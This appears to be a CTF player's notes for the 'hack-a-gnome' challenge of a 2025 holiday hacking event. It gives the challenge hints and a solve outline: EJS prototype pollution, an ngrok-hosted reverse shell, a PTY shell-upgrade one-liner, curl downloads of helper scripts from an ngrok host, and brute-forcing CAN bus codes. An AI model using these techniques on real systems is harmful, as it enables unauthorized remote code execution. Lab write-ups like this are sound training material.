rjohnsen/hhc-2025/content/act3/hack-a-gnome/_index.md

 | Once you determine the type of database the gnome control factory's login is using, look up its documentation on default document types and properties.
 This information could help you generate a list of common English first names to try in your attack. |
 | Oh no, it sounds like the CAN bus controls are not sending the correct signals!
 If only there was a way to hack into your gnome's control stats/signal container to get command-line access to the smart-gnome.
 This would allow you to fix the signals and control the bot to shut down the factory.
 During my development of the robotic prototype, we found the factory's pollution to be undesirable, which is why we shut it down.
 If not updated since then, the gnome might be running on old and outdated packages. |
 | Nice!
 Once you have command-line access to the gnome, you'll need to fix the signals in the canbus_client.py file so they match up correctly.
 After that, the signals you send through the web UI to the factory should properly control the smart-gnome.
 You could try sniffing CAN bus traffic, enumerating signals based on any documentation you find, or brute-forcing combinations until you discover the right signals to control the gnome from the web UI. |

+python3 -c 'import pty;pty.spawn("/bin/bash")'

+Remember to refresh the main page for the reverse shell to work!!!

+NOTE: SOLVE THIS USING EDGE!!!!

+curl -o test.py  https://scarabaeiform-prolixly-odin.ngrok-free.dev/test.sh
+curl -o cb.py  https://scarabaeiform-prolixly-odin.ngrok-free.dev/cb.py

+General workflow from start to finish:

+1. In the webapp, inspect all endpoint
+2. Find the endpoint where you can set data
+3. Provoke error messages to find the rendering engine (EJS)
+4. See if it is possible to set __proto__

+Enabling shell
+5. On endpoint set client = 1
+6. On endpoint set debug = 1
+7. Set up NGROK netcat reverse
+8. Plant payload for reverse shell using the NGROK address and port
+9. Refresh main page

+In spawned shell:
+10. Privilege escalate using python to get a fancy bash shell
+11. Inspect canbus_client.py
+12. Inspect README.md

+Identifying missing HEX code
+13. Set up NGROK web frontend
+14. Spin up Python webserver
+15. Serve HEX bruteforce python script
+16. Run bruteforce script whilst observing if the robot moves